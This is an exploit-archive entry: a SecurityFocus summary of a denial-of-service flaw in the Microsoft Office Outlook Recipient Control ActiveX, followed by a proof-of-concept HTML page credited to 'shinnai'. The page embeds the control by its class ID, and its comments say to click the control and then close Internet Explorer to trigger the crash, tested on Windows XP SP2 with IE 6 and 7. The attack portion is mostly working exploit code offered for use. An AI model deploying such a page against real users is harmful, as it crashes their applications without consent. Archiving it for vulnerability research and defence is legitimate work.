32 lines
No EOL
1.1 KiB
HTML
32 lines
No EOL
1.1 KiB
HTML
source: https://www.securityfocus.com/bid/21649/info
|
|
|
|
The Microsoft Office Outlook Recipient Control is prone to a denial-of-service vulnerability.
|
|
|
|
An attacker can exploit this issue to trigger denial-of-service conditions in Internet Explorer or other applications that use the ActiveX control.
|
|
|
|
Specific information regarding affected packages is currently unavailable. This BID will be updated as more information becomes available.
|
|
|
|
<!--
|
|
------------------------------------------------------------------------
|
|
Microsoft Office Outlook Recipient Control (ole32.dll) Denial of Service
|
|
author: shinnai
|
|
site: http://shinnai.altervista.org
|
|
mail: shinnai[at]autistici[dot]org
|
|
and, always, special thanks to rgod
|
|
|
|
Tested on Windows Xp Professional SP2 all patched
|
|
|
|
works with Internet Explorer 6 & 7
|
|
------------------------------------------------------------------------
|
|
-->
|
|
|
|
<html>
|
|
<head>
|
|
<title></title>
|
|
</head>
|
|
<object classid="clsid:0006F023-0000-0000-C000-000000000046" id="oLook" width="180" height="14"></object>
|
|
</html>
|
|
|
|
<!--
|
|
Just enable the control by clicking on it, then try to close IE.
|
|
--> |